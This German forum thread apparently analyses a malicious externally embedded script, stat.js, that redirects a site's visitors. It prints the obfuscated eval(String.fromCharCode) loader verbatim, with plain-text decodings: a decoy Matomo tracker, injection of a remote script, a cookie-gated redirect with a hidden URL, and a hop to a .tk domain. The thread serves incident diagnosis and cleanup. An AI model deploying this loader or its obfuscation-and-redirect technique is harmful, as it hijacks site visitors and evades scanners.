Komische Umleitung durch externes Javascript

lookshe

Seit einigen Tagen passiert hier Komisches (Weiterleitungen auf fremde Seiten) durch folgendes extern eingebundene Javascript:
https://examhome.net/stat.js?v=1.0.3

Code:
// Obfuscated loader as served from https://examhome.net/stat.js?v=1.0.3 (captured sample, kept
// byte-identical as evidence). Every payload is hidden as a String.fromCharCode() array and fed
// to eval(), presumably so that signature scanners and a casual reader see only numbers.
//   1st eval:  decodes to the standard Piwik/Matomo tracker snippet (_paq, setTrackerUrl to
//              https://examhome.innocraft.cloud/piwik.php, setSiteId '1', injects piwik.js).
//   mrGFvAlG:  a second, doubly-encoded stage that appends a <script> tag loading
//              https://mp3menu.org/mp3.js into <head>; the trailing eval() runs it.
// The plain-text decoding of both stages follows further down in this thread.
eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 95, 112, 97, 113, 32, 61, 32, 95, 112, 97, 113, 32, 124, 124, 32, 91, 93, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 116, 114, 97, 99, 107, 80, 97, 103, 101, 86, 105, 101, 119, 39, 93, 41, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 101, 110, 97, 98, 108, 101, 76, 105, 110, 107, 84, 114, 97, 99, 107, 105, 110, 103, 39, 93, 41, 59, 10, 32, 32, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 117, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 105, 110, 110, 111, 99, 114, 97, 102, 116, 46, 99, 108, 111, 117, 100, 47, 34, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 84, 114, 97, 99, 107, 101, 114, 85, 114, 108, 39, 44, 32, 117, 43, 39, 112, 105, 119, 105, 107, 46, 112, 104, 112, 39, 93, 41, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 83, 105, 116, 101, 73, 100, 39, 44, 32, 39, 49, 39, 93, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 44, 32, 103, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 44, 32, 115, 61, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 103, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 103, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 32, 103, 46, 100, 101, 102, 101, 114, 61, 116, 114, 117, 101, 59, 32, 103, 46, 115, 114, 99, 61, 117, 43, 39, 112, 105, 119, 105, 107, 46, 106, 115, 39, 59, 32, 115, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 103, 44, 115, 41, 
59, 10, 32, 32, 125, 41, 40, 41, 59, 10)); var mrGFvAlG = String.fromCharCode(118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59); eval(mrGFvAlG);
Das Ganze dekodiert zu:

Code:
// Plain-text rendering of the stat.js loader above (decoded by hand; the multi-line string
// literals are shown unescaped for readability and are not runnable as-is).
//
// Stage 1: a textbook Piwik/Matomo page-view tracker pointing at examhome.innocraft.cloud.
// Harmless by itself -- but it is delivered via eval(String.fromCharCode(...)), and a legitimate
// analytics snippet has no reason to be obfuscated. The "clean" first stage reads as cover for
// the second one.
eval(
"   var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u=\"https://examhome.innocraft.cloud/\";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
");
// Stage 2: builds a <script> element whose src is itself char-code encoded
// ("https://mp3menu.org/mp3.js" -- the nested String.fromCharCode hides the hostname from a
// simple grep), appends it to <head> and runs the whole string through a second eval().
// mp3.js is the cookie-gated redirect to https://mp3menu.org/red.php decoded further down.
var mrGFvAlG = "var simplelement = document.createElement('script'); 
simplelement.type = 'text/javascript'; 
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115); // "https://mp3menu.org/mp3.js"
simplelement.async = true; 
document.getElementsByTagName(\"head\")[0].appendChild(simplelement);";
// Executes the stage-2 loader string.
eval(mrGFvAlG);
Dann folgt eine kleine Kette von Weiterleitungen über mehrere dubiose Seiten.
 

Chromatin

Der erste Teil sieht ja koscher aus – das ist ein ganz normaler Piwik/Matomo-Tracking-Schnipsel. Dass er allerdings per eval(String.fromCharCode(...)) verschleiert ausgeliefert wird, ist für sich genommen schon ein Warnsignal: ein legitimes Analytics-Snippet hat keinen Grund, sich so zu tarnen. Die URL im 2. eval (eval(mrGFvAlG)) lässt hier jedenfalls die Virenscanner aktiv werden. Hast du den JS-Code, der da geladen werden soll? eval ist aber schon fies im Allgemeinen ;)
 

lookshe

Code:
// Contents of https://mp3menu.org/mp3.js as loaded by stage 2 above -- again one
// eval(String.fromCharCode(...)) blob, kept byte-identical as evidence. Decoded (see the
// plain-text version below) it is a cookie-gated redirect: if no "mp3menu=" cookie exists,
// set "mp3menu=yes" for 8 hours and send the visitor to https://mp3menu.org/red.php, whose
// URL is char-code encoded once more inside the already encoded payload.
eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 
111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));
bzw. dekodiert:
Code:
// Decoded mp3.js (hand-rendered: the \" escapes come from the original string literal and are
// not present in the code that actually executes). Self-invoking, runs once per page load.
(function() {
			// Cookie gate: a browser that already carries an "mp3menu=" cookie is left alone.
			// This is why the redirect is hard to reproduce -- it fires at most once per browser
			// until the cookie expires, so testing needs a fresh profile or private window.
			if (document.cookie.indexOf(\"mp3menu=\") >= 0) {

			} else {
			  // 10*60*1000*6*8 ms = 28,800,000 ms = 8 hours. `expiry` has no var/let and so
			  // becomes an implicit global.
			  expiry = new Date();
			  expiry.setTime(expiry.getTime()+(10*60*1000*6*8));
			  // The cookie is written before the redirect, so even an interrupted redirect
			  // suppresses the next attempt for 8 hours.
			  document.cookie = \"mp3menu=yes; expires=\" + expiry.toGMTString();
			  // Target URL hidden as char codes, presumably to dodge simple string matching
			  // on "mp3menu.org" in the served script.
			  var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112); // "https://mp3menu.org/red.php"
			  // location.replace() swaps out the current history entry, so the browser's Back
			  // button does not return to the infected page; the href assignment is a fallback.
			  window.location.replace(mp3menu);
			  window.location.href = mp3menu;
			}
  })();
Auf dieser Seite (red.php) steht dann im Header ein Javascript, das die nächste Weiterleitung anstößt:
Code:
<!-- Inline script in the <head> of https://mp3menu.org/red.php: the next hop of the chain, an
     unconditional redirect to a throwaway .tk domain over plain http (the query string looks
     like a campaign or tracking ID -- not verified). There is no cookie gate at this hop; the
     gate sits in mp3.js one step earlier. -->
<script>window.location.replace("http://ygetygsdfertase.tk/index/?4831537102803");window.location.href = "http://ygetygsdfertase.tk/index/?4831537102803";</script>
Wobei ich allein schon den Aufruf von https://mp3menu.org/red.php auf diesem Umweg sehr fragwürdig finde und denke, dass das, was auch immer stat.js hier einbindet, sofort entfernt werden sollte. Dabei reicht es nicht, nur den Script-Tag zu löschen: Man sollte herausfinden, wo die Referenz auf examhome.net in der Seite steckt (Template, Plugin, Datenbank) und wie sie dort hingekommen ist – solange der Einschleusungsweg unbekannt ist, kann die Einbindung jederzeit zurückkommen. Beim Nachstellen bitte beachten, dass der Redirect wegen des mp3menu-Cookies pro Browser nur alle 8 Stunden auslöst; also in einem frischen Profil bzw. privaten Fenster testen.
 